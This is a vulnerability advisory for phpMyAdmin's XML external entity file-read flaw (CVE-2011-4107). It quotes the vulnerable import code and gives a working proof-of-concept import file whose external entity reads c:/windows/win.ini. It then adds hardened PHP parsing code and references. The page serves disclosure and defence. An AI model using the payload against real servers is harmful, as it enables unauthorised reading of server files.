Bug: phpMyAdmin Arbitrary File Read ( Ascii Version )


Published: 2011.11.21
Credit: 80sec
Risk: Low
CWE: CWE-200
CVE: CVE-2011-4107
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Hi

80sec reported this bug on wooyun. phpMyAdmin uses the simplexml_load_string
function to read XML from user input; this may be exploited to read files
from the server or network.

In libraries/import/xml.php there is some code like this:


/**
 * Load the XML string
 *
 * The option LIBXML_COMPACT is specified because it can
 * result in increased performance without the need to
 * alter the code in any way. It's basically a freebee.
 */
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);

/**
 * The XML was malformed
 */
if ($xml === FALSE) {

So you just need to make an XML like this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>

<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
    <!--
    - Structure schemas
    -->
    <pma:structure_schemas>
        <pma:database name="test" collation="utf8_general_ci" charset="utf8">
            <pma:table name="ts_ad">
                &hi80sec;
            </pma:table>
        </pma:database>
    </pma:structure_schemas>

    <!--
    - Database: 'thinksns'
    -->
    <database name="thinksns">
        <!-- Table ts_ad -->
    </database>
</pma_xml_export>

Then import this XML in phpMyAdmin, and you will get the content you want.

From: http://www.wooyun.org/bugs/wooyun-2010-03185

:)
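
The hardened counterpart of the simplexml_load_string() call quoted above, as an added example (not from the original post and not phpMyAdmin's own code): it parses without entity substitution, refuses any document that carries a DOCTYPE, and disables the external entity loader on PHP versions before 8.0. The function name safe_load_import_xml and the sample strings are assumptions made for illustration.

```php
<?php
// Added example, not phpMyAdmin code. safe_load_import_xml() is a hypothetical name.

/** Parse untrusted import XML; return SimpleXMLElement, or false if malformed or carrying a DTD. */
function safe_load_import_xml(string $buffer)
{
    if ($buffer === '') {
        return false;
    }
    // PHP < 8.0: switch off the external entity loader for this parse.
    // The call is deprecated from PHP 8.0, where libxml2 >= 2.9 is required
    // and external entities are not loaded unless LIBXML_NOENT is passed.
    $prevLoader = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
    $prevErrors = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        // Deliberately no LIBXML_NOENT or LIBXML_DTDLOAD; LIBXML_NONET blocks network fetches.
        if (!$dom->loadXML($buffer, LIBXML_COMPACT | LIBXML_NONET)) {
            return false;
        }
        // An import file has no need for a DTD, so any DOCTYPE is refused outright.
        foreach ($dom->childNodes as $node) {
            if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
                return false;
            }
        }
        return simplexml_import_dom($dom);
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prevErrors);
        if ($prevLoader !== null) {
            libxml_disable_entity_loader($prevLoader);
        }
    }
}

// Constructed samples shaped like the import file above; the entity target is a placeholder.
$withDtd = '<?xml version="1.0"?><!DOCTYPE d [<!ENTITY e SYSTEM "file:///placeholder">]>'
         . '<pma_xml_export version="1.0"><database name="test">&e;</database></pma_xml_export>';
$plain   = '<?xml version="1.0"?><pma_xml_export version="1.0"><database name="test"/></pma_xml_export>';

var_dump(safe_load_import_xml($withDtd));
var_dump(safe_load_import_xml($plain) instanceof SimpleXMLElement);
```

The DOCTYPE check runs on the parsed node tree rather than on the raw bytes, so it does not depend on how the uploaded file is encoded.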

References:

http://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php
https://bugzilla.redhat.com/show_bug.cgi?id=751112
http://xforce.iss.net/xforce/xfdb/71108
http://www.wooyun.org/bugs/wooyun-2010-03185
http://www.securityfocus.com/bid/50497
http://secunia.com/advisories/46447
http://seclists.org/fulldisclosure/2011/Nov/21
http://packetstormsecurity.org/files/view/106511/phpmyadmin-fileread.txt
http://osvdb.org/76798

Copyright 2014, cxsecurity.com